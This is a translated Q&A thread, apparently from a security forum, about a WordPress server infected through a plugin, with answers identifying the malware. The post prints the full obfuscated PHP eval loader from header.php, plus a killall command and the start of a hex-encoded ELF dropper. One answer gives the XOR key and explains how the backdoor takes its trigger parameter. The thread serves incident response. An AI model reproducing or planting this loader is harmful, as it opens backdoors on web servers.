Wordpress infettato da Trojan

4

Quindi recentemente il nostro server (VPS CentOS6.5) ha iniziato a ospitare un sito WP che era, o è diventato, infetto (tramite plugin revslider) con una specie di trojan (probabilmente mittente dello spam, dato che siamo arrivati alla lista di Spamhaus molto velocemente)

Il nucleo (pensiamo) è un piccolo file chiamato system.php link

Che sembra essere attivato da un'intestazione WP infetta header.php link

È riuscito a creare 4 lavori cron, e siamo molto interessati a ciò che stava facendo. Come posso scoprirlo?

Modifica
ecco header.php

<?php for($o=0,$e='&\'()*+,-.:]^_'{|,,,|-((.(*,|)')&(_(*,+)'(-(,+_(-(.(:(](^(_('({)]+'+{+|,&-^-_(^)](](^(_(^(:('(,-_(.-_(](:(,+_(-+_(--_('(.(.+'+_(-(:(.(,+_(--^(.-_(:+{(]+{(:(:(^('(,(,(,(.(:(:(:+{(,(_(:(_+_(-)](](,(:-_(,,&(_,&+_(-('(:(.(,(.(.+_(-(.+'(,-_(.('(](.(_-^(,)](:({(,(,(_(](.(](.-^(,(,('(,(](:(.({(]-^+_(-(^+_(-(^(.(](,+'(',&(:+{(.-^(_-_('-_(]-^+_(-+{(:-^+_(--^(,(_(:(](,(_(')](:,&(.(,+_(-+{+_(-+|(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](.(.(.(](,+_(-(,,&(^('('(^(]-^(,(.(,(.(:-_+_(-(^(_)](.(.(.(](,+_(-(,,&(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](:(^(.-^(,(_(_(](]+|('('(.(.+_(--^(,(.(:+{+_(-+'('+_(-(:('(:-_(,,&(,-_(.+{(,+_(-(:)]('+_(-(.+{(_+_(-(_+'+_(-)]+_(-(_(,(.(:('(')]+_(-,&(:+'+_(--^(.(.('(_(,-^(:('(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](:(_(:(,(,-_('+{(]-^(.('('-_+_(-(,(,(^(^-^+_(-('(,+'(:(_(:+|+_(-({('+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(')](^-_(_(:(^+'(_+'('+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]-_+_(-)](^,&(,({(:+'(:+|(,)](:({(]+'(.(:(:(,(]+{(:(.(^(:(^(.(,({(:(:(:('(]+'(:(_+_(-(.(.-_(:(^(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.('(](,(.(.+{(.(^(:(](:(^(^('(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+'(]+|(.(.(:({+_(-)](.(,+_(--^(.(.(.(]+_(--^(_(.+_(--_(^+{(^(,(^({(:,&(,-_(:(^(,(:(.(](:(:(](:(_(.(^-^+_(-(:+_(-({(,,&(.+'+_(-(:(.(,+_(--^(.-_(:+{(]+|(_)]('(_+_(-(]+_(--^(:+|(:+'+_(--^(:+'(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-('+_(-(],&(.(,+_(-(:(:)](.(.(,-^(.({+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+'(,+'(.+_(-(,(_+_(-)](:+{(,-_(.(_(:+'(:(](.(,(]-^+_(-('(,({('(^('(^(.+'(:(^+_(--_(.(](:(^+_(--_(.+|(^)]+_(-+|(:(](:('(.+_(-(,(:(.(,+_(--^(:)]('-^(]+|(:(_(^-^+_(-('(,('(:-^(,(_(,-_(.+{(,-_(.)]('+_(-(](.(_+|(,,&('({(,-_(:('(:-_(,(:(:,&(,-_(_(.('+_(-(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+'(]+|(.(.(:(_+_(-+'(:(_(,(](_,&('-_(](.('-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:-^(,+'(:(_(_)](,(.+_(-)](:,&(:+'(:(^(:+|+_(-+'(.-_(:({(]+|(_)]('(_+_(-(]+_(--^(:+|(:+'+_(--^(:+'(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-('+_(-(],&(.(:+_(-({(.(^(:(^(:(](.+'(](_+_(-('(,(^('(^('(,(](:(_({(_(,(.-^(:(:(,,&(.+|(^({+_(-('(](:('(^(:+_(-(,+{(.(,(:(^(.-_(.-^(,-^(.(_+_(-+_(-(^-^(.+{(:(](.+|(,(](:(,+_(--^(.(:(:)](,(^+_(-+'(^(:(,+'(,(.(.+_(-(.,&+_(-)]('+{(],&(.-_(.-^(,-^(.(_+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+_(-(,+'(:+|(,(_(,-_(.+{(,-_(.)]('+_(-(]('(_,&(^-^+_(-(:+_(-({(,,&(.)](,+{(.(,+_(-)](:-^(:-^+_(-)](:(,(]+'(,-^(,(:(:(:(.+'(:(^(.(,+_(-(:(:)](.(.(,-^(.({(]+'(,-^(,(:(:(:(.+'(:(^(.(,(,(.(.-_(:+'(,('+_(-+'(^(:(,+'(,-^(:+_(-(.(^+_(-(_(:+{(,+{(:)](,)]+_(-+{(.+'(](_+_(-('(,(^(.-^(.(^(,(.(:(.+_(-)]+_(-(^(.(_+_(-)](.+'(^(^(.,&(,(](.(.(:+|(,(](.-_+_(-(_(.(.(:('+_(-({+_(-+'(^(:(,+'(,-^(:+_(-('(,(](:(_({(_(,(.(:(:(,(](:(_(](^(^+_(-(:(,(^(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+'(^(.+_(-+{(,-^('+'('-^(,)](:(.(,(](_+'(:({(,(](:+_(-+_(-(_+_(-('+_(-(:(:('(:+'(^(,('(:(,(](.(^('(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](.(,(]+'(.+{(.(,(,+'(.+|(^+'+_(-(:(,)](:-^(:+|(],&('+'(^+_(-(:('(^+|(](](_+'(^(^+_(-+'(,-^(:+_(-(:(.(]+'(:+'(,+|(_+'(.+_(-(,-^(_(^(^(^+_(-(:(,(^('(.(:+'(,(^(:,&(,+|(.(:(:+_(-(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.('(](,(.(.+{(.(^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^('(](](_(,+'(:(,+_(--^(.+{(^(^(,(_(,(.(:,&(:('(:(^(:(_+_(-(.(.(:(.(^+_(--_(:(_+_(--^(^(^(,(.(:+|(:(,(:(^(:(](,-_(:-^('+_(-(](.(_+|(,,&('({(,-_(:('(:-_(,(:(:,&(,-_(_(.('+_(-(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(,)](,+'(.)](^+'(^(^(]('+_(-(.(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{(_)]+_(-('+_(-(:(:+{(.+'+_(--^(.(,(](.(_,&(:-_(,(^(.+|(_)]+_(-(^(,-^(.(_(,(_(,+{(:-_(,(_(_,&('-_(](.('-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:(^(,+'(.+{(_)]+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(_('-^(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(.+'+_(-('(.,&(^('(,+_(-(:(](:+{(:('(,(:(,+|(,,&(.-_(.(.(:(](.(](^+'+_(--^(](.('+{(_(.(_(,(:+'(,+|(_(.('('(,({(.(](^({(.,&(,({(:,&(:('(,+|(:+'(,,&(_(:(.,&+_(-(:+_(-+'(^(.+_(-+{(,-^('+'('-^(,)](:(.(,(](_+'(:({(,(](:+_(-+_(-(_+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(:(_,&+_(-(_(]-_+_(-)](^,&(,+|(:('(.,&(]+'(:(,(,(^(.(](:(,(,(.(.(.+_(-(_(,(](,+'(:-^(.+|(,-_(^)](,+|(:-_(:({(,({(:+_(-(^-_+_(-,&(,(^('(.(.+_(-(:(^(:+'(,(](.(:(,)](,+|(.(,(](.(^+'(]-_(:+|('(,+_(-+_(-(:+'(,+|(_(.(:-^(,+'(:(_(_)]+_(-+{(,(^(:+{(,(_(,,&(:(_+_(--^(_(:(.,&+_(-)](.(,(](.(,('+_(-)](:+|('+_(-(.+'(:+'(,(](.(:(,)](,+|(.(,(](.(^+'(]-_(:+|('(,(](:(_({+_(-('(.-_(:+'+_(-({(.(,(^-_+_(-(](](:(:+'(:({+_(-)](,+|(,(:(.(](:-_(:(](.(.(^(:(,(_(:(](:(:(:(^(,(_('+'+_(-+_(-(_-^(:-^(^(_(,(^(^-_+_(-+|(,(.(,,&(:-^(,-_(.('(:(^(.+{(:+'(,('(_,&+_(--_(])]+_(-)](:('(.,&+_(--_(.+_(-(,(](_(.('(.(,(:+_(--^+_(-(.+_(-+|(:(_(,)]('-^(,(_(:+|(,)](.+{(:+'(:(](:(:(^('+_(--^+_(--^(:('('-^(:('('+'(^+_(-(:('(.+{(_+_(-(_+'+_(-)](^(.(,({(:+'(:+|(,)](:({(]+'(:)](:('(,,&(.(,+_(-(_+_(--_(,(](:(_(:+|(_(,(:+'(,+|(_(.(.-^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^('+{(],&(:)](:('(,,&(.(,(_)]+_(--_(,(](:(_(:+|(],&('+'(](:(:+_(-(.-^(:(](.+_(-(^-_+_(-('(](:('(^(:+'(,+{(:,&(]+'(.(](:)]+_(--_(_(^(^(:(,+'(,-^(:+_(-(_(:(]+'(.(,(,+{(.+|(:(:(]+{(.({(^)]+_(-(_(,-^('(.(:({(,)](.('(,(:(:+|(:(:(]+|(_+|(,,&(,-_(_+_(-(',&('(_+_(-)](:-^(,+{(:({(.(.(]+{(.(,(]-^+_(-('(,({('(.(:+_(-(,-_(:-_+_(-+'(.-_(.(]+_(-({(]-_(^(,(,('(,(^(:+_(-(.,&(,(:(:+|(,(](_+'(.-^(:(](:(^(^('(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(](.(_-^(:(^(](.(:-^('(_(,(.(,+'(.+_(-(.+'+_(--^(:+{+_(-({(:-_('-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](.+_(-(.(,+_(-)](.('(,-_(.('('-^(]-_(.(_+_(--_(,)](.+{(.+_(-(.(,+_(-)](.('(,-_(.('('-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](.+_(-(:+_(-(,-_(:-_(,(_+_(-(^(:(:+_(-(:(.(,(^(^(^+'(]-_(:+_(-('(,+_(-+_(-(:(_(,)](.(.(:)](]+{(,(^(](^+_(-+'(,-^(:-^(:(^(:(^(:(_+_(-(.(.-_(:(^(](:(_+_(-(^(^(^+{(^(,(.-_(^(:(,+|(.(_(,(](.)](.(.(,(.(.+'(^({(^(.+_(-(:(,,&(.)](,(^(.(:(,-_(.(]('-^(]-_(.(_+_(--_(,)](]-_(:,&(_(.(,(:(:(^(](.(_(.('(.(,,&('({('(_(,(.(,(](.(.(:+|(,(]('+{(]-^(.)]('+'(]+|(:('+_(-+_(-(^+{(](.('+{(.(.+_(-,&(:+{(,(:(.(_(:(:(](:(_(]('(_+_(-(](,-^(:,&(:-_(](.('('(,+|(_(:('-_+_(-(,(_+_(-(^)](^+|(^(_+_(-(.(:-_(,,&(:(_+_(--^(:)]('-^(]-_(.(:+_(--_(])]+_(-(_+_(-(.(.)](,)](:-_(,(^(:)](:(:(](:(_+_(-(^(,(^+{(^(,(.-_(:+|(,)](:+{(,(^(_+'('(.(,(]('-^(]+{('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,(.+_(-)](:,&(:+'(:(^(:+|+_(-+'(.-_(:({(](:(_+_(-(^(^(^+{+_(-(,('(_(:(_(^+_(-(:+'(,+|(_(.+_(-(_(,(.(:(_(_)](,(,(,-^(.+_(-(:(_+_(--_(.+_(-(,)](.-_('-^(]-_(:(^(,+{(:(.+_(-+{(.(,(:(_(,)](,+|(,(^(:+'(:(:(,(^(_,&+_(-(.+_(-+_(-(]('(:(:(.+{+_(-({(:(.+_(-(:(_(.(_(_(^(_('+{(^('(,(,+_(-)](:(:(.(,(](.('(]+_(-+'(.(:(.(_(,-^(_(.+_(-+'(^(^+_(-)]('(^('(,(](_(_(.(^('('(](:('+_(-)](:('(^('(,+{(](:('(^(.)](,(:(.(:(,-_(_,&('+'(]+|(:(.+_(-+_(-(^+{(]('(_(,(_(](^(](:(.+_(-({(:({(:('+_(-(.(_,&+_(-+_(-(,(.(,(.(.(.(:+|(],&('-_(],&(:,&('+_(-(](.(_+|+_(-+'(^(_(,,&('+{('(,(](:(.({(.+'(.+|(:(^(,('(.+'(](^+_(-('(](:('(_(:-_(:+_(-(_(:(:('(_(:(_,&+_(-+|(.,&(^-_+_(--^(,-^('+'('({(.+'(:(^(,-_(.(^(:(,(](:(_+_(-(^(,(.)](^+'(,-_('(,(](:(.({(]-^(.(^('({(^(_(,(^(^(,+_(-(^(,-^(.(_(.+'(](.('('(,+|+_(-+_(-(_('(:(_(_+|(,,&(,-_(.+{(:(](:+'(,(_(:+|+_(-)](.-_('-^(]-_(.(:(_,&(](:(:(_('+{(_(.(.+'(.(:+_(-({(.(^(:(^(:(](.(_(^+'+_(-,&+_(-({(:('('+_(-(]-^(.(:(](:('+_(-(.+{(,-^(.(_(^-^+_(-,&(]+{('(_(:(_(^+_(-(.-^(_(,(.+|(.(:(,(^(.(_(](.+_(-+{(,(](:+|(')]+_(-(.(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(.)](',&(,(^(_({(.+'(.-_(.-^(,-^(.(_+_(--^(^(_(,({('-^(',&(,(^('+'(^+_(-(.-_(:(^(,(:(.+'+_(-(_(:(.(,(.(:-_(.)](,(_(:+|(,-^(.-_('-^(])]+_(-)](^({(^(,(]('('(_(:(_(](:(_({+_(-('(](,(')](](](.+_(-(^)](^(.+_(-({(:-_(:({+_(-({(.('(]+'(.+|(:(:+_(--_(.(_(^-^('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(]('('(_(.)](](_('('+_(-({(_(_('(.(,('(_+|(:+|(,)](_+_(-(^+{(:(,(,+|('+{(]-^(:)](_+{(.+{(.(:(](^+_(-,&(,({(:)](:(_+_(-+'(:(_(,(](_(.('(.(,+'(_)]+_(-(.(,(.(](.('+{(^(:(_(:(.({(_(,(](:(^-_(,(.(.(:+_(--^(^(_(,,&(_-_+_(-)](,+|(:+|+_(-+'(.-_(:({(](:(_+_(-(^+'(^-^(])](.(^(:+{(]({('+'(](:(](,(^-_(_(.(:-^(:+|('+{(_(.(^+{+_(-)](,+|(.(]+_(-({(.(:(.(.(,-^(_,&+_(-(.(,+_(-(]('('(,+_(--^(.-_(,('(]+'(_({('({(]-_(:('+_(-({(^(,(]+{+_(-+'(,,&(:-^(,(:(](^('+{('({(^+{+_(-)](](](.-^(,(^(,-^(.+{(:(_(:,&(]({(_(:(_,&(_+_(-(]+|(:-_('+{+_(-+|(:+'(:(,(,(_(:(_(](.(_+{+_(-(_(,,&(.(,(^)]+_(-(](](:('(_(.+'(](:('+'(_(,(](:(^-_(_(.(:-^(:+|('+{(_(.(^+{(^(,(]-^(:+_(-(^('(,+'(:(,+_(-)](.(,(^('+_(-(_(](:('(_(.+'(](_(_+{(^+{('(:(_(](](.('-^(:+|('+{(_(.(^+{(^(,(.+'(:(^+_(-,&(:({(:-_+_(--_(.(,+_(--^(^(_(,,&('-^(',&(,({('+'(^+_(-(](,(^-_(_(.(]+|(]+{('({(_(.(^+{(^(,(.+'(:(^(,)](.(_(:)]+_(-({(.(,+_(--^(^(_(,,&('+{(_(.(_(,(^+'(_(:(](:(:(:(,({(.,&(^)](^(.(])]+_(-,&+_(-(.(:(_(:,&(]({('+_(-(^+|(_(.(]+|(]+{('({(_(.(^+{+_(-)](,+|(:(,(,(_(.(^(.(^(,-^(_,&+_(-(.(,+_(-(](.(_)](^(:(_(:(.-^(_(,(:('(^+|(](](_+'(^(.+_(-,&(]+{(.+_(-(:(](,+{(.+_(-+_(--^(_+'(:(:+_(-(:(.(,(^(^('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,+_(-(,(_(:(:(.+{+_(--^(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(^({(.(.(_(,(^+'(,(:(.+|('-^(]-_(.(_(,+{(]-_(^(_('(,(.-^(,(.(:+'(,)](.(.('(_+_(-({(:(,(](_+_(-('+_(-)](:(](:+|+_(--^(:(,(,(.(_+'(_('(^(^(_(^+_(-)]+_(-(_(,-^(.(]('(_(,(](.(_(,(_(.(_('(_(^)]('+{+_(-(_(^,&(,-_(:('(.-_(](^(:,&+_(--_(.(_(:+'(]+{(_(:+_(-(,(^(.(,-^(:+_(-(:+_(-(,(^('(:(.(^(,+_(-('(](](.(]-_(:-_(,)](_+_(-(^+{(^(,(,-_(:(,(,(.(.(^('(_(])](,+'(',&(.-^(,(^('(,(_(.(_(,(^+'+_(-('(](,(^-_(,-^(.)](](^+_(-('(,(.(:(]('+_(-(.+'(.(,+_(--^(:({(.(^+_(--_(:('+_(--^(^(_(,({('-^('+{+_(-)](.(_+_(-+'(.-_(.(](,,&(.(,(](.+_(-+_(-(,(:('(,('(,(](:(^)](_(:(:+_(-(^+|(_(.(]+|+_(-(.+_(-(:(^(_+_(-(.(:+|+_(-(.(.(:(,(_(.(^(:(.(,-^(_,&+_(-+_(-(^(.(]+|('-^(',&(,)]('+'(^+_(-(](,(^-_(_(.(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(:(,(_(:(,(](](_('('(,+{+_(-+_(-(_(](:(_(_)]+_(-(.+_(-(:(:(,(_+_(-(,(](](_('('(,+{+_(-+_(-(_(.(:(_(_+|(,,&('({(_(.(.-_(^(:(_(:(:(_(,(_(:)](:(:(,(.(.(:+_(--^+_(-+'(,+'(.+_(-(,(_+_(-+'(:(.+_(-)](:)](.(.(,(:(:('(](:(^+{+_(-(,(.+'(,(_+_(-+'(:(.+_(-)](:)](.(.(,(:(:('(](:(^+'(]-_(:+_(-('(,(^+_(-(.-^(_(,(](:(:(:(,('(:(_(^(:+_(-+{(,,&('+'(:+_(-(,+{(.(,(:(^(:)](.-_+_(-({(:+_(-(^(:+_(--_(](.(.)](.+_(-(:(^(.(,+_(-(:(:)](.(.(,-^(.({+_(--^(^(_(,({('+{(_(.+_(-('(^)](_(:(.-_(:+'+_(-({(.(,(^-_+_(-(](](:(:+'(:({+_(-)](,+|+_(-)](.(.(:(:(,('(.)](_)]+_(-('+_(-(:(:('(:+'(](:(.({+_(-(.+_(-(^(.(^(,(:(.(,(^+'+_(--^(:(](:('(.+_(-(,-_(:(,(](.(_-^(:(^(](.('-^(]+{('({(_(.(:('(:(^+_(-)](:(_(,(:(.+|('-^(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(](:(:+_(-(.-^(:(](:(^(^)](,(.(,-^(:+|('+_(-(]-^(:(,(](:('+_(-(.+{(_+_(-(]+|(^(:+_(--^+_(-({(:('(:(,(,+|('+{(,(.(.+{(.(^(:(](:(^(](]+_(-,&(,({(,,&(:(_+_(-+'(:(_(,(](_(:(.,&+_(-(:+_(-+'(](_(,(,(,(](:+_(-(,(_(,(^(.(:(,-_(.(]('-^(]-_(.(_+_(--_(])]+_(-(_(^({(^(,(,-_(:-_+_(-)](.-_(:-_(,,&(_,&(^-^+_(-(:+_(-({(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+'(^(:(,+'(,-^(:+_(-('+_(-(]-^(:(,(](:('+_(-(.+{(_+_(-(:({(:+|(^,&(](](:(^(:(_(_(,('('(,(]('('('+_(-(:({(.-_('+|(.(](,(,+_(-('(_-_+_(-({(:({(:({+_(-(:(:+|(]+|('-^(:+|(^(_(,({(_-_(',&(:(^+_(-(,(.(^(,(^+_(-,&(.(.(,(,(_,&(^(_(,(^(,-_(_(.(_(,(:+'(,+|(_(.+_(-(_(,-^(.({(](_(,(_+_(-(.('+'(',&(,)]('+'(](:(:+_(-('(.(,({('({+_(-(.(.,&(:+{+_(-,&(,+'(:-^(,({(]-^(.(](,+{(^(,(:({(:+|+_(-+{(,,&('+'+_(-)](,-_(:-^+_(-+'(:-^(.-_(](:(_+_(-(^(^(^+{(](.(.)](',&(,)](_-^(]-^+_(-(^+_(-+_(-(.-^+_(-+_(-(_,&(^(_(,(^(,-_(_(.+_(-('(^)](,(:(.+|('-^(.+{(.(.(^(:(,(_(:(](:-_(:({(,,&(:+'(,)]+_(-(^(.('+_(--^(.+'(](.+_(-('+_(-({(,,&(:-^+_(-+'(:(,(](.(_(:('-_+_(-(,(_+_(-(^(^(]-_+_(-({(.(_(.+{(,(:(.(:+_(-)](.(_(:('+_(-({(.,&(^(:(,+_(-(](:('(_(:+'(](:(_({+_(-('(](,(.-^(:(](:(_(^+{+_(-(:+_(-)](.(_(,(_(,-_(.+{(,-_(.)]('-^(]-_(.(_+_(--_(])](_+_(-(-(_(*,*)'(-(-)^*&,|-(,*(.(*,++^(*,|+'(:)^(*,|(^(^(:-^,:,,(.(*,|)_)\'),(:-^(*,.+^(*,++^(*,|+'+')'(*,|)^-',+,_-),+-^(*,*({)'*&,),.-((.(.(*,.+^(*,++^(*,|+'+')_)_)*(:(^(.(*,.+^(*,++^(^(^(*,|+'+'(:(:)^-'-',:,,(.(\'*&,:-)-),+-*(.(*+|+)*++(+,*++((:(:-^(*+|*)*|*|*^*:*+)'(,(**.+*+*+&+|*)*|*|*^*:*++|+,*\'+(+))^(*+|+&*|+)+*)'(,(**.+*+*+&+|+&*|+)+*+|+,*\'+(+))^(*+|*-*++*)'(,(**.+*+*+&+|*-*++*+|+,*\'+(+))^-'(*,^)'(*+|*)*|*|*^*:*++^(-,^,+-:(-+')^,:,,(.,+,'-&-*-:(.(*,^(:(:-^(*,^)'(*+|+&*|+)+*+^(-,^,+-:(-+')^-',:,,(.,+,'-&-*-:(.(*,^(:(:-^(*,^)'(*+|*-*++*+^(-,^,+-:(-+')^-',:,,(.(\'*&,,-+,{,)-*,:,|,{+|,+-.,:-)-*-)(.(-,*,+,)-(-:-&-*(-(:(:-^,+-,,\',_(.(-,,-+,{,)-*,:,|,{(&,*,+,)-(-:-&-*(.(*,+(_(*,^(:-^,:,,(.(\'(*,^(:-^-(,+-*-+-(,{)^-'(*,+,_)'*&-)-*-(,_,+,{(.(*,+(:)^(*,^,_)'*&-)-*-(,_,+,{(.(*,^(:)^(*-(,_)'(*,+,_(+(*,^,_)^(*,,,_)'(*,+,_('(*-(,_)^,,,|-((.(*,|)')&)^(*,|)_(*,,,_)^(*,|(^)'(*,^,_(:-^(*-&)'*&-)-+,(-)-*-((.(*,+(_(*,|(_(*,^,_(:)^(*,*({)'(((*,^((+{(((*-&(()^-',:,,(.(*-(,_(:-^(*-&)'*&-)-+,(-)-*-((.(*,+(_(*,,,_(_(*-(,_(:)^(*,^)'*&-)-+,(-)-*-((.(*,^(_)&(_(*-(,_(:)^(*,*({)'(((*,^((+{(((*-&(()^-'-(,+-*-+-(,{(.(*,*(:)^-'(-(:)^-'(*,*)'*&,*,+,)-(-:-&-*(.(*,*(_(*,^(:)^,+-,,\',_(.(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>  

ed ecco una parte dei comandi & codifica utilizzata in system.php
(troppo grande per postare qui per intero, vedi il pastebin)

@system("killall -9 ".basename("/usr/bin/host"));
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x20\x0d\x00\x00\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03  

Qualcuno riconosce il tipo di codifica, quindi posso decodificare e indagare ulteriormente da solo?

Modifica 2: ha calcolato che system.php utilizza la codifica esadecimale (decodificato link )
TL; DR è un ELF - c'è un modo per scoprire cosa fa, oltre a eseguirlo su una casella di test?

    
posta RozzA 01.09.2015 - 02:03
fonte

3 risposte

4

Penso che tu sia l'orgoglioso proprietario di una backdoor "libworker.so"! Malware Must Die ha una buona analisi di esso, leggi che prima di eseguirlo da solo. L'autore di Malware Must Die non è un madrelingua inglese, ma svela una tonnellata di dettagli.

Malware Must Die ha il codice PHP "dropper" che viene scaricato tramite una copia di "Web Shell by oRb", quindi dovrai esplorare il sito di WordPress compromesso con un pettine a denti stretti. Vorrei grep per "eval (" in ogni file come inizio.

La seconda pasta ( header.php ) sembra forse un programma di gateway. Ci sono un paio di livelli di offuscamento che nascondono un programma che include un pezzo di codice crittografato e un programma di decrittografia che bitwise-exclusive-ors la chiave contro il blocco crittografato, e quindi eval il codice decrittografato. Poiché il file header.php trasporta il codice crittografato e la stringa di chiavi arriva su una richiesta HTTP, il codice probabilmente contiene un nome host o un indirizzo IP o qualcosa che ti consente di rintracciare l'origine. Mi azzardo a indovinare che il codice crittografato è una specie di gateway di file. Cioè, qualcuno chiama il tuo server web con l'URL header.php e un cookie speciale, o alcuni parametri GET o POST, insieme a un nome file. Il codice decodificato recupera il file da qualche parte e lo passa al chiamante header.php . Questa è solo una supposizione, comunque.

Potresti riuscire a recuperare la chiave di crittografia se qualcuno ha chiamato header.php come GET HTTP, con un parametro key=blahblah . Potrebbe essere degno di un'occhiata in access_log per essere sicuro.

UPDATE:

Il testo crittografato header.php può essere ripristinato con una stringa di chiavi di "SjJVkE6rkRYj", 12 lettere ACII, senza virgolette. Ho finalmente riconosciuto la routine decrypter, e cercata su Google. Hacker News ha una bella spiegazione su come ottenere una stringa di chiavi di crittografia Xor. C'è una stringa di commento di Hacker News ancora più vecchia sulla stessa chiave / script e che porta a paste dello stesso codice che ottengo quando decritto il tuo testo crittografato con header.php . È il malware "superfetch" PHP e mentre è un gateway di file, come ho predetto in precedenza, non contiene indirizzi IP o nomi di host. Invece, il codice gateway utilizza un URL che arriva in un GET o POST con il parametro denominato "SjJVkE6rkRYj" o in un cookie con lo stesso parametro. È intelligente, ma solo oscurato, non protetto.

    
risposta data 01.09.2015 - 19:41
fonte
1

Hai guardato in / var / spool / cron e / etc / crontab o in qualsiasi altra sottodirectory CRON all'interno di / var o / etc? Forse potresti vedere tutti i lavori cron programmati qui.

Se hai già stabilito che il file ELF era parte dell'infezione, per rispondere all'ultima parte della tua domanda, la eseguirò solo in un ambiente sandbox se vuoi avere una visione vera di ciò che fa. Spero che questo aiuti.

    
risposta data 01.09.2015 - 17:58
fonte
-1

La codifica dello shellcode è un riferimento esadecimale di base. L'ELF è probabilmente correlato alla botnet Ramnit.

    
risposta data 02.09.2015 - 08:20
fonte

Leggi altre domande sui tag